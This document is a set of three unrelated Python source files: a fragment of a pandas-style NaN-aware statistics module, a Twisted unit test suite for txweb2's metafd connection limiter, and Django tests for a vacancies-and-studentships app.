_is_int_or_datetime_dtype, _is_any_int_dtype)
class disallow(object):
def __init__(self, *dtypes):
super(disallow, self).__init__()
self.dtypes = tuple(np.dtype(dtype).type for dtype in dtypes)
def check(self, obj):
return hasattr(obj, 'dtype') and issubclass(obj.dtype.type,
self.dtypes)
def __call__(self, f):
@functools.wraps(f)
def _f(*args, **kwargs):
obj_iter = itertools.chain(args, compat.itervalues(kwargs))
if any(self.check(obj) for obj in obj_iter):
raise TypeError('reduction operation {0!r} not allowed for '
'this dtype'.format(f.__name__.replace('nan',
'')))
return f(*args, **kwargs)
return _f
class bottleneck_switch(object):
def __init__(self, zero_value=None, **kwargs):
self.zero_value = zero_value
self.kwargs = kwargs
def __call__(self, alt):
bn_name = alt.__name__
try:
bn_func = getattr(bn, bn_name)
except (AttributeError, NameError): # pragma: no cover
bn_func = None
@functools.wraps(alt)
def f(values, axis=None, skipna=True, **kwds):
if len(self.kwargs) > 0:
for k, v in compat.iteritems(self.kwargs):
if k not in kwds:
kwds[k] = v
try:
if self.zero_value is not None and values.size == 0:
if values.ndim == 1:
# wrap the 0's if needed
if is_timedelta64_dtype(values):
return lib.Timedelta(0)
return 0
else:
result_shape = (values.shape[:axis] +
values.shape[axis + 1:])
result = np.empty(result_shape)
result.fill(0)
return result
if _USE_BOTTLENECK and skipna and _bn_ok_dtype(values.dtype,
bn_name):
result = bn_func(values, axis=axis, **kwds)
# prefer to treat inf/-inf as NA, but must compute the func
# twice :(
if _has_infs(result):
result = alt(values, axis=axis, skipna=skipna, **kwds)
else:
result = alt(values, axis=axis, skipna=skipna, **kwds)
except Exception:
result = alt(values, axis=axis, skipna=skipna, **kwds)
return result
return f
def _bn_ok_dtype(dt, name):
# Bottleneck chokes on datetime64
if (not is_object_dtype(dt) and
not _is_datetime_or_timedelta_dtype(dt)):
# bottleneck does not properly upcast during the sum
# so can overflow
if name == 'nansum':
if dt.itemsize < 8:
return False
return True
return False
def _has_infs(result):
if isinstance(result, np.ndarray):
if result.dtype == 'f8':
return lib.has_infs_f8(result.ravel())
elif result.dtype == 'f4':
return lib.has_infs_f4(result.ravel())
try:
return np.isinf(result).any()
except (TypeError, NotImplementedError) as e:
# if it doesn't support infs, then it can't have infs
return False
def _get_fill_value(dtype, fill_value=None, fill_value_typ=None):
""" return the correct fill value for the dtype of the values """
if fill_value is not None:
return fill_value
if _na_ok_dtype(dtype):
if fill_value_typ is None:
return np.nan
else:
if fill_value_typ == '+inf':
return np.inf
else:
return -np.inf
else:
if fill_value_typ is None:
return tslib.iNaT
else:
if fill_value_typ == '+inf':
# need the max int here
return np.iinfo(np.int64).max
else:
return tslib.iNaT
def _get_values(values, skipna, fill_value=None, fill_value_typ=None,
isfinite=False, copy=True):
""" utility to get the values view, mask, dtype
if necessary copy and mask using the specified fill_value
copy = True will force the copy """
values = _values_from_object(values)
if isfinite:
mask = _isfinite(values)
else:
mask = isnull(values)
dtype = values.dtype
dtype_ok = _na_ok_dtype(dtype)
# get our fill value (in case we need to provide an alternative
# dtype for it)
fill_value = _get_fill_value(dtype, fill_value=fill_value,
fill_value_typ=fill_value_typ)
if skipna:
if copy:
values = values.copy()
if dtype_ok:
np.putmask(values, mask, fill_value)
# promote if needed
else:
values, changed = _maybe_upcast_putmask(values, mask, fill_value)
elif copy:
values = values.copy()
values = _view_if_needed(values)
# return a platform independent precision dtype
dtype_max = dtype
if is_integer_dtype(dtype) or is_bool_dtype(dtype):
dtype_max = np.int64
elif is_float_dtype(dtype):
dtype_max = np.float64
return values, mask, dtype, dtype_max
def _isfinite(values):
if _is_datetime_or_timedelta_dtype(values):
return isnull(values)
if (is_complex_dtype(values) or is_float_dtype(values) or
is_integer_dtype(values) or is_bool_dtype(values)):
return ~np.isfinite(values)
return ~np.isfinite(values.astype('float64'))
def _na_ok_dtype(dtype):
return not _is_int_or_datetime_dtype(dtype)
def _view_if_needed(values):
if _is_datetime_or_timedelta_dtype(values):
return values.view(np.int64)
return values
def _wrap_results(result, dtype):
""" wrap our results if needed """
if is_datetime64_dtype(dtype):
if not isinstance(result, np.ndarray):
result = lib.Timestamp(result)
else:
result = result.view(dtype)
elif is_timedelta64_dtype(dtype):
if not isinstance(result, np.ndarray):
result = lib.Timedelta(result)
else:
result = result.astype('i8').view(dtype)
return result
def nanany(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, False, copy=skipna)
return values.any(axis)
def nanall(values, axis=None, skipna=True):
values, mask, dtype, _ = _get_values(values, skipna, True, copy=skipna)
return values.all(axis)
@disallow('M8')
@bottleneck_switch(zero_value=0)
def nansum(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = values.sum(axis, dtype=dtype_max)
the_sum = _maybe_null_out(the_sum, axis, mask)
return _wrap_results(the_sum, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmean(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna, 0)
the_sum = _ensure_numeric(values.sum(axis, dtype=dtype_max))
count = _get_counts(mask, axis)
if axis is not None and getattr(the_sum, 'ndim', False):
the_mean = the_sum / count
ct_mask = count == 0
if ct_mask.any():
the_mean[ct_mask] = np.nan
else:
the_mean = the_sum / count if count > 0 else np.nan
return _wrap_results(the_mean, dtype)
@disallow('M8')
@bottleneck_switch()
def nanmedian(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna)
def get_median(x):
mask = notnull(x)
if not skipna and not mask.all():
return np.nan
return algos.median(_values_from_object(x[mask]))
if values.dtype != np.float64:
values = values.astype('f8')
if axis is None:
values = values.ravel()
notempty = values.size
# an array from a frame
if values.ndim > 1:
# there's a non-empty array to apply over otherwise numpy raises
if notempty:
return _wrap_results(np.apply_along_axis(get_median, axis, values), dtype)
# must return the correct shape, but median is not defined for the
# empty set so return nans of shape "everything but the passed axis"
# since "axis" is where the reduction would occur if we had a nonempty
# array
shp = np.array(values.shape)
dims = np.arange(values.ndim)
ret = np.empty(shp[dims != axis])
ret.fill(np.nan)
return _wrap_results(ret, dtype)
# otherwise return a scalar value
return _wrap_results(get_median(values) if notempty else np.nan, dtype)
def _get_counts_nanvar(mask, axis, ddof):
count = _get_counts(mask, axis)
d = count-ddof
# always return NaN, never inf
if np.isscalar(count):
if count <= ddof:
count = np.nan
d = np.nan
else:
mask2 = count <= ddof
if mask2.any():
np.putmask(d, mask2, np.nan)
np.putmask(count, mask2, np.nan)
return count, d
def _nanvar(values, axis=None, skipna=True, ddof=1):
# private nanvar calculator
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count, d = _get_counts_nanvar(mask, axis, ddof)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
X = _ensure_numeric(values.sum(axis))
XX = _ensure_numeric((values ** 2).sum(axis))
return np.fabs((XX - X ** 2 / count) / d)
@disallow('M8')
@bottleneck_switch(ddof=1)
def nanstd(values, axis=None, skipna=True, ddof=1):
result = np.sqrt(_nanvar(values, axis=axis, skipna=skipna, ddof=ddof))
return _wrap_results(result, values.dtype)
@disallow('M8','m8')
@bottleneck_switch(ddof=1)
def nanvar(values, axis=None, skipna=True, ddof=1):
# we are going to allow timedelta64[ns] here
# but NOT going to coerce them to the Timedelta type
# as this could cause overflow
# so var cannot be computed (but std can!)
return _nanvar(values, axis=axis, skipna=skipna, ddof=ddof)
@disallow('M8','m8')
def nansem(values, axis=None, skipna=True, ddof=1):
var = nanvar(values, axis, skipna, ddof=ddof)
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count, _ = _get_counts_nanvar(mask, axis, ddof)
return np.sqrt(var)/np.sqrt(count)
@bottleneck_switch()
def nanmin(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna,
fill_value_typ='+inf')
# numpy 1.6.1 workaround in Python 3.x
if is_object_dtype(values) and compat.PY3:
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.min, apply_ax, values)
else:
try:
result = builtins.min(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = ensure_float(values.sum(axis, dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.min(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
@bottleneck_switch()
def nanmax(values, axis=None, skipna=True):
values, mask, dtype, dtype_max = _get_values(values, skipna,
fill_value_typ='-inf')
# numpy 1.6.1 workaround in Python 3.x
if is_object_dtype(values) and compat.PY3:
if values.ndim > 1:
apply_ax = axis if axis is not None else 0
result = np.apply_along_axis(builtins.max, apply_ax, values)
else:
try:
result = builtins.max(values)
except:
result = np.nan
else:
if ((axis is not None and values.shape[axis] == 0)
or values.size == 0):
try:
result = ensure_float(values.sum(axis, dtype=dtype_max))
result.fill(np.nan)
except:
result = np.nan
else:
result = values.max(axis)
result = _wrap_results(result, dtype)
return _maybe_null_out(result, axis, mask)
def nanargmax(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='-inf',
isfinite=True)
result = values.argmax(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
def nanargmin(values, axis=None, skipna=True):
"""
Returns -1 in the NA case
"""
values, mask, dtype, _ = _get_values(values, skipna, fill_value_typ='+inf',
isfinite=True)
result = values.argmin(axis)
result = _maybe_arg_null_out(result, axis, mask, skipna)
return result
@disallow('M8','m8')
def nanskew(values, axis=None, skipna=True):
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
# floating point error
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
result = ((np.sqrt((count ** 2 - count)) * C) /
((count - 2) * np.sqrt(B) ** 3))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 3] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 3:
return np.nan
return result
@disallow('M8','m8')
def nankurt(values, axis=None, skipna=True):
mask = isnull(values)
if not _is_floating_dtype(values):
values = values.astype('f8')
count = _get_counts(mask, axis)
if skipna:
values = values.copy()
np.putmask(values, mask, 0)
A = values.sum(axis) / count
B = (values ** 2).sum(axis) / count - A ** 2
C = (values ** 3).sum(axis) / count - A ** 3 - 3 * A * B
D = (values ** 4).sum(axis) / count - A ** 4 - 6 * B * A * A - 4 * C * A
B = _zero_out_fperr(B)
C = _zero_out_fperr(C)
D = _zero_out_fperr(D)
result = (((count * count - 1.) * D / (B * B) - 3 * ((count - 1.) ** 2)) /
((count - 2.) * (count - 3.)))
if isinstance(result, np.ndarray):
result = np.where(B == 0, 0, result)
result[count < 4] = np.nan
return result
else:
result = 0 if B == 0 else result
if count < 4:
return np.nan
return result
@disallow('M8','m8')
def nanprod(values, axis=None, skipna=True):
mask = isnull(values)
if skipna and not _is_any_int_dtype(values):
values = values.copy()
values[mask] = 1
result = values.prod(axis)
return _maybe_null_out(result, axis, mask)
def _maybe_arg_null_out(result, axis, mask, skipna):
# helper function for nanargmin/nanargmax
if axis is None or not getattr(result, 'ndim', False):
if skipna:
if mask.all():
result = -1
else:
if mask.any():
result = -1
else:
if skipna:
na_mask = mask.all(axis)
else:
na_mask = mask.any(axis)
if na_mask.any():
result[na_mask] = -1
return result
def _get_counts(mask, axis):
if axis is None:
return float(mask.size - mask.sum())
count = mask.shape[axis] - mask.sum(axis)
try:
return count.astype(float)
except AttributeError:
return np.array(count, dtype=float)
def _maybe_null_out(result, axis, mask):
if axis is not None and getattr(result, 'ndim', False):
null_mask = (mask.shape[axis] - mask.sum(axis)) == 0
if np.any(null_mask):
if np.iscomplexobj(result):
result = result.astype('c16')
else:
result = result.astype('f8')
result[null_mask] = np.nan
else:
null_mask = mask.size - mask.sum()
if null_mask == 0:
result = np.nan
return result
def _zero_out_fperr(arg):
if isinstance(arg, np.ndarray):
return np.where(np.abs(arg) < 1e-14, 0, arg)
else:
return 0 if np.abs(arg) < 1e-14 else arg
@disallow('M8','m8')
def nancorr(a, b, method='pearson', min_periods=None):
"""
a, b: ndarrays
"""
if len(a) != len(b):
raise AssertionError('Operands to nancorr must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
f = get_corr_func(method)
return f(a, b)
def get_corr_func(method):
if method in ['kendall', 'spearman']:
from scipy.stats import kendalltau, spearmanr
def _pearson(a, b):
return np.corrcoef(a, b)[0, 1]
def _kendall(a, b):
rs = kendalltau(a, b)
if isinstance(rs, tuple):
return rs[0]
return rs
def _spearman(a, b):
return spearmanr(a, b)[0]
_cor_methods = {
'pearson': _pearson,
'kendall': _kendall,
'spearman': _spearman
}
return _cor_methods[method]
@disallow('M8','m8')
def nancov(a, b, min_periods=None):
if len(a) != len(b):
raise AssertionError('Operands to nancov must have same size')
if min_periods is None:
min_periods = 1
valid = notnull(a) & notnull(b)
if not valid.all():
a = a[valid]
b = b[valid]
if len(a) < min_periods:
return np.nan
return np.cov(a, b)[0, 1]
def _ensure_numeric(x):
if isinstance(x, np.ndarray):
if is_integer_dtype(x) or is_bool_dtype(x):
x = x.astype(np.float64)
elif is_object_dtype(x):
try:
x = x.astype(np.complex128)
except:
x = x.astype(np.float64)
else:
if not np.any(x.imag):
x = x.real
elif not (is_float(x) or is_integer(x) or is_complex(x)):
try:
x = float(x)
except Exception:
try:
x = complex(x)
except Exception:
raise TypeError('Could not convert %s to numeric' % str(x))
return x
# NA-friendly array comparisons
import operator
def make_nancomp(op):
def f(x, y):
xmask = isnull(x)
ymask = isnull(y)
mask = xmask | ymask
result = op(x, y)
if mask.any():
if is_bool_dtype(result):
result = result.astype('O')
np.putmask(result, mask, np.nan)
return result
return f
nangt = make_nancomp(operator.gt)
nange = make_nancomp(operator.ge)
nanlt = make_nancomp(operator.lt)
nanle = make_nancomp(operator.le)
naneq = make_nancomp(operator.eq)
nanne = make_nancomp(operator.ne)
def unique1d(values):
"""
Hash table-based unique
"""
if np.issubdtype(values.dtype, np.floating):
table = _hash.Float64HashTable(len(values))
uniques = np.array(table.unique(_ensure_float64(values)),
dtype=np.float64)
elif np.issubdtype(values.dtype, np.datetime64):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(_ensure_int64(values))
uniques = uniques.view('M8[ns]')
elif np.issubdtype(values.dtype, np.timedelta64):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(_ensure_int64(values))
uniques = uniques.view('m8[ns]')
elif np.issubdtype(values.dtype, np.integer):
table = _hash.Int64HashTable(len(values))
uniques = table.unique(_ensure_int64(values))
else:
table = _hash.PyObjectHashTable(len(values))
uniques = table.unique(_ensure_object(values))
return uniques
|
|
##
# Copyright (c) 2011-2014 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Tests for txweb2.metafd.
"""
from socket import error as SocketError, AF_INET
from errno import ENOTCONN
from twext.internet import sendfdport
from txweb2 import metafd
from txweb2.channel.http import HTTPChannel
from txweb2.metafd import ReportingHTTPService, ConnectionLimiter
from twisted.internet.tcp import Server
from twisted.application.service import Service
from twext.internet.test.test_sendfdport import ReaderAdder
from txweb2.metafd import WorkerStatus
from twisted.trial.unittest import TestCase
class FakeSocket(object):
"""
A fake socket for testing.
"""
def __init__(self, test):
self.test = test
def fileno(self):
return "not a socket"
def setblocking(self, blocking):
return
def getpeername(self):
if self.test.peerNameSucceed:
return ("4.3.2.1", 4321)
else:
raise SocketError(ENOTCONN, "Transport endpoint not connected")
def getsockname(self):
return ("4.3.2.1", 4321)
class InheritedPortForTesting(sendfdport.InheritedPort):
"""
L{sendfdport.InheritedPort} subclass that prevents certain I/O operations
for better unit testing.
"""
def startReading(self):
"Do nothing."
def stopReading(self):
"Do nothing."
def startWriting(self):
"Do nothing."
def stopWriting(self):
"Do nothing."
class ServerTransportForTesting(Server):
"""
tcp.Server replacement for testing purposes.
"""
def startReading(self):
"Do nothing."
def stopReading(self):
"Do nothing."
def startWriting(self):
"Do nothing."
def stopWriting(self):
"Do nothing."
def __init__(self, *a, **kw):
super(ServerTransportForTesting, self).__init__(*a, **kw)
self.reactor = None
class ReportingHTTPServiceTests(TestCase):
"""
Tests for L{ReportingHTTPService}
"""
peerNameSucceed = True
def setUp(self):
def fakefromfd(fd, addressFamily, socketType):
return FakeSocket(self)
def fakerecvfd(fd):
return "not an fd", "not a description"
def fakeclose(fd):
""
def fakegetsockfam(fd):
return AF_INET
self.patch(sendfdport, 'recvfd', fakerecvfd)
self.patch(sendfdport, 'fromfd', fakefromfd)
self.patch(sendfdport, 'close', fakeclose)
self.patch(sendfdport, 'getsockfam', fakegetsockfam)
self.patch(metafd, 'InheritedPort', InheritedPortForTesting)
self.patch(metafd, 'Server', ServerTransportForTesting)
# This last stubbed out just to prevent dirty reactor warnings.
self.patch(HTTPChannel, "callLater", lambda *a, **k: None)
self.svc = ReportingHTTPService(None, None, None)
self.svc.startService()
def test_quickClosedSocket(self):
"""
If a socket is closed very quickly after being {accept()}ed, requesting
its peer (or even host) address may fail with C{ENOTCONN}. If this
happens, its transport should be supplied with a dummy peer address.
"""
self.peerNameSucceed = False
self.svc.reportingFactory.inheritedPort.doRead()
channels = self.svc.reportingFactory.connectedChannels
self.assertEqual(len(channels), 1)
self.assertEqual(list(channels)[0].transport.getPeer().host, "0.0.0.0")
class ConnectionLimiterTests(TestCase):
"""
Tests for L{ConnectionLimiter}
"""
def test_loadReducedStartsReadingAgain(self):
"""
L{ConnectionLimiter.statusesChanged} determines whether the current
"load" of all subprocesses - that is, the total outstanding request
count - is high enough that the listening ports attached to it should
be suspended.
"""
builder = LimiterBuilder(self)
builder.fillUp()
self.assertEquals(builder.port.reading, False) # sanity check
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
builder.loadDown()
self.assertEquals(builder.port.reading, True)
def test_processRestartedStartsReadingAgain(self):
"""
L{ConnectionLimiter.statusesChanged} determines whether the current
number of outstanding requests is above the limit, and either stops or
resumes reading on the listening port.
"""
builder = LimiterBuilder(self)
builder.fillUp()
self.assertEquals(builder.port.reading, False)
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
builder.processRestart()
self.assertEquals(builder.port.reading, True)
def test_unevenLoadDistribution(self):
"""
Subprocess sockets should be selected for subsequent socket sends by
ascending status. Status should sum sent and successfully subsumed
sockets.
"""
builder = LimiterBuilder(self)
# Give one simulated worker a higher acknowledged load than the other.
builder.fillUp(True, 1)
# There should still be plenty of spare capacity.
self.assertEquals(builder.port.reading, True)
# Then slam it with a bunch of incoming requests.
builder.fillUp(False, builder.limiter.maxRequests - 1)
# Now capacity is full.
self.assertEquals(builder.port.reading, False)
# And everyone should have an even amount of work.
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
def test_processStopsReadingEvenWhenConnectionsAreNotAcknowledged(self):
"""
L{ConnectionLimiter.statusesChanged} determines whether the current
number of outstanding requests is above the limit.
"""
builder = LimiterBuilder(self)
builder.fillUp(acknowledged=False)
self.assertEquals(builder.highestLoad(), builder.requestsPerSocket)
self.assertEquals(builder.port.reading, False)
builder.processRestart()
self.assertEquals(builder.port.reading, True)
def test_workerStatusRepr(self):
"""
L{WorkerStatus.__repr__} will show all the values associated with the
status of the worker.
"""
self.assertEquals(repr(WorkerStatus(1, 2, 3, 4, 5, 6, 7, 8)),
"<WorkerStatus acknowledged=1 unacknowledged=2 total=3 "
"started=4 abandoned=5 unclosed=6 starting=7 stopped=8>")
def test_workerStatusNonNegative(self):
"""
L{WorkerStatus.__repr__} will show all the values associated with the
status of the worker.
"""
w = WorkerStatus()
w.adjust(
acknowledged=1,
unacknowledged=-1,
total=1,
)
self.assertEquals(w.acknowledged, 1)
self.assertEquals(w.unacknowledged, 0)
self.assertEquals(w.total, 1)
class LimiterBuilder(object):
"""
A L{LimiterBuilder} can build a L{ConnectionLimiter} and associated objects
for a given unit test.
"""
def __init__(self, test, requestsPerSocket=3, socketCount=2):
# Similar to MaxRequests in the configuration.
self.requestsPerSocket = requestsPerSocket
# Similar to ProcessCount in the configuration.
self.socketCount = socketCount
self.limiter = ConnectionLimiter(
2, maxRequests=requestsPerSocket * socketCount
)
self.dispatcher = self.limiter.dispatcher
self.dispatcher.reactor = ReaderAdder()
self.service = Service()
self.limiter.addPortService("TCP", 4321, "127.0.0.1", 5,
self.serverServiceMakerMaker(self.service))
for ignored in xrange(socketCount):
subskt = self.dispatcher.addSocket()
subskt.start()
subskt.restarted()
# Has to be running in order to add stuff.
self.limiter.startService()
self.port = self.service.myPort
def highestLoad(self):
return max(
skt.status.effective()
for skt in self.limiter.dispatcher._subprocessSockets
)
def serverServiceMakerMaker(self, s):
"""
Make a serverServiceMaker for use with
L{ConnectionLimiter.addPortService}.
"""
class NotAPort(object):
def startReading(self):
self.reading = True
def stopReading(self):
self.reading = False
def serverServiceMaker(port, factory, *a, **k):
s.factory = factory
s.myPort = NotAPort()
# TODO: technically, the following should wait for startService
s.myPort.startReading()
factory.myServer = s
return s
return serverServiceMaker
def fillUp(self, acknowledged=True, count=0):
"""
Fill up all the slots on the connection limiter.
@param acknowledged: Should the virtual connections created by this
method send a message back to the dispatcher indicating that the
subprocess has acknowledged receipt of the file descriptor?
@param count: Amount of load to add; default to the maximum that the
limiter.
"""
for _ignore_x in range(count or self.limiter.maxRequests):
self.dispatcher.sendFileDescriptor(None, "SSL")
if acknowledged:
self.dispatcher.statusMessage(
self.dispatcher._subprocessSockets[0], "+"
)
def processRestart(self):
self.dispatcher._subprocessSockets[0].stop()
self.dispatcher._subprocessSockets[0].start()
self.dispatcher.statusMessage(
self.dispatcher._subprocessSockets[0], "0"
)
def loadDown(self):
self.dispatcher.statusMessage(
self.dispatcher._subprocessSockets[0], "-"
)
|
|
from datetime import datetime, timedelta
from django.test import TestCase
from django.test.client import Client
from django.test.utils import override_settings
from django.conf import settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.http import HttpRequest, QueryDict
from cms.api import create_page
from contacts_and_people.models import Person
from vacancies_and_studentships.models import Vacancy, Studentship
from vacancies_and_studentships.lister import (
List, VacanciesAndStudentshipsPluginLister, FilterList
)
from contacts_and_people.models import Entity
class VacanciesTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
self.toothjob = Vacancy(
title = "Pulling teeth",
slug = "pulling-teeth",
date = datetime.now() + timedelta(days=30),
)
def test_generic_attributes(self):
self.toothjob.save()
# the item has no informative content
self.assertEqual(self.toothjob.is_uninformative, True)
# there are no Entities in the database, so this can't be hosted_by anything
self.assertEqual(self.toothjob.hosted_by, None)
# since there are no Entities in the database, default to settings's template
self.assertEqual(self.toothjob.get_template, settings.CMS_TEMPLATES[0][0])
def test_date_related_attributes(self):
self.toothjob.date = datetime(year=2012, month=12, day=12)
self.assertEqual(self.toothjob.get_when, "December 2012")
def test_link_to_more(self):
self.assertEqual(
self.toothjob.auto_page_view_name,
"vacancies-and-studentships"
)
self.toothjob.hosted_by = Entity(slug="slug")
self.assertEqual(
self.toothjob.link_to_more(),
"/vacancies-and-studentships/slug/"
)
@override_settings(CMS_TEMPLATES = (('null.html', "Null"),))
class VacanciesItemsViewsTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
# create a vacancy item
self.toothjob = Vacancy(
title = "Pulling teeth",
slug = "pulling-teeth",
date = datetime.now() + timedelta(days=30),
)
self.adminuser = User.objects.create_user('arkestra', '[email protected]', 'arkestra')
self.adminuser.is_staff=True
self.adminuser.save()
# vacancy tests
def test_unpublished_vacancy_404(self):
self.toothjob.save()
# Issue a GET request.
response = self.client.get('/vacancy/pulling-teeth/')
# Check that the response is 404 because it's not published
self.assertEqual(response.status_code, 404)
def test_unpublished_vacancy_200_for_admin(self):
self.toothjob.save()
# log in a staff user
self.client.login(username='arkestra', password='arkestra')
response = self.client.get('/vacancy/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_vacancy_200_for_everyone(self):
self.toothjob.published = True
self.toothjob.save()
# Check that the response is 200 OK.
response = self.client.get('/vacancy/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_vacancy_context(self):
self.toothjob.published = True
self.toothjob.save()
response = self.client.get('/vacancy/pulling-teeth/')
self.assertEqual(response.context['vacancy'], self.toothjob)
@override_settings(CMS_TEMPLATES = (('null.html', "Null"),))
class StudentshipsItemsViewsTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
# create a studentship item
self.toothjob = Studentship(
title = "Pulling teeth",
slug = "pulling-teeth",
date = datetime.now() + timedelta(days=30),
)
self.adminuser = User.objects.create_user('arkestra', '[email protected]', 'arkestra')
self.adminuser.is_staff=True
self.adminuser.save()
# studentship tests
def test_unpublished_studentship_404(self):
self.toothjob.save()
# Issue a GET request.
response = self.client.get('/studentship/pulling-teeth/')
# Check that the response is 404 because it's not published
self.assertEqual(response.status_code, 404)
def test_unpublished_studentship_200_for_admin(self):
self.toothjob.save()
# log in a staff user
self.client.login(username='arkestra', password='arkestra')
response = self.client.get('/studentship/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_studentship_200_for_everyone(self):
self.toothjob.published = True
self.toothjob.save()
# Check that the response is 200 OK.
response = self.client.get('/studentship/pulling-teeth/')
self.assertEqual(response.status_code, 200)
def test_published_studentship_context(self):
self.toothjob.published = True
self.toothjob.save()
response = self.client.get('/studentship/pulling-teeth/')
self.assertEqual(response.context['studentship'], self.toothjob)
class ReverseURLsTests(TestCase):
def test_vacancy_reverse_url(self):
self.assertEqual(
reverse("vacancy", kwargs={"slug": "tooth-puller"}),
"/vacancy/tooth-puller/"
)
def test_studentship_reverse_url(self):
self.assertEqual(
reverse("studentship", kwargs={"slug": "tooth-puller"}),
"/studentship/tooth-puller/"
)
def test_archived_vacancies_base_reverse_url(self):
self.assertEqual(
reverse("vacancies-archive"),
"/archived-vacancies/"
)
def test_archived_vacancies_reverse_url(self):
self.assertEqual(
reverse("vacancies-archive", kwargs={"slug": "some-slug"}),
"/archived-vacancies/some-slug/"
)
def test_current_vacancies_base_reverse_url(self):
self.assertEqual(
reverse("vacancies-current"),
"/vacancies/"
)
def test_current_vacancies_reverse_url(self):
self.assertEqual(
reverse("vacancies-current", kwargs={"slug": "some-slug"}),
"/vacancies/some-slug/"
)
def test_archived_studentships_base_reverse_url(self):
self.assertEqual(
reverse("studentships-archive"),
"/archived-studentships/"
)
def test_archived_studentships_reverse_url(self):
self.assertEqual(
reverse("studentships-archive", kwargs={"slug": "some-slug"}),
"/archived-studentships/some-slug/"
)
def test_current_studentships_base_reverse_url(self):
self.assertEqual(
reverse("studentships-current"),
"/studentships/"
)
def test_current_studentships_reverse_url(self):
self.assertEqual(
reverse("studentships-current", kwargs={"slug": "some-slug"}),
"/studentships/some-slug/"
)
def test_base_reverse_url(self):
self.assertEqual(
reverse("vacancies-and-studentships"),
"/vacancies-and-studentships/"
)
def test_reverse_url(self):
self.assertEqual(
reverse("vacancies-and-studentships", kwargs={"slug": "some-slug"}),
"/vacancies-and-studentships/some-slug/"
)
@override_settings(CMS_TEMPLATES = (('null.html', "Null"),))
class VacanciesStudentshipsEntityPagesViewsTests(TestCase):
def setUp(self):
# Every test needs a client.
self.client = Client()
home_page = create_page(
"School home page",
"null.html",
"en",
published=True
)
self.school = Entity(
name="School of Medicine",
slug="medicine",
auto_vacancies_page=True,
website=home_page
)
# entity vacancies and studentships URLs - has vacancies and studentships pages
def test_main_url(self):
self.school.save()
response = self.client.get('/vacancies-and-studentships/')
self.assertEqual(response.status_code, 200)
def test_entity_url(self):
self.school.save()
response = self.client.get('/vacancies-and-studentships/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_url(self):
self.school.save()
response = self.client.get('/vacancies-and-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_main_archive_url(self):
self.school.save()
response = self.client.get('/archived-vacancies/')
self.assertEqual(response.status_code, 200)
def test_entity_vacancies_archive_url(self):
self.school.save()
response = self.client.get('/archived-vacancies/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_vacancies_archive_url(self):
self.school.save()
response = self.client.get('/archived-vacancies/xxxx/')
self.assertEqual(response.status_code, 404)
def test_main_archived_studentships_url(self):
self.school.save()
response = self.client.get('/archived-studentships/')
self.assertEqual(response.status_code, 200)
def test_entity_archived_studentships_url(self):
self.school.save()
response = self.client.get('/archived-studentships/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_archived_studentships_url(self):
self.school.save()
response = self.client.get('/archived-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_main_all_current_studentships_url(self):
self.school.save()
response = self.client.get('/studentships/')
self.assertEqual(response.status_code, 200)
def test_entity_all_current_studentships_url(self):
self.school.save()
response = self.client.get('/studentships/medicine/')
self.assertEqual(response.status_code, 200)
def test_bogus_entity_all_current_studentships_url(self):
self.school.save()
response = self.client.get('/current-studentships/xxx/')
self.assertEqual(response.status_code, 404)
# entity vacancies and studentships URLs - no vacancies and studentships pages
def test_no_auto_page_main_url(self):
self.school.auto_vacancies_page = False
self.school.save()
response = self.client.get('/vacancies-and-studentships/')
self.assertEqual(response.status_code, 404)
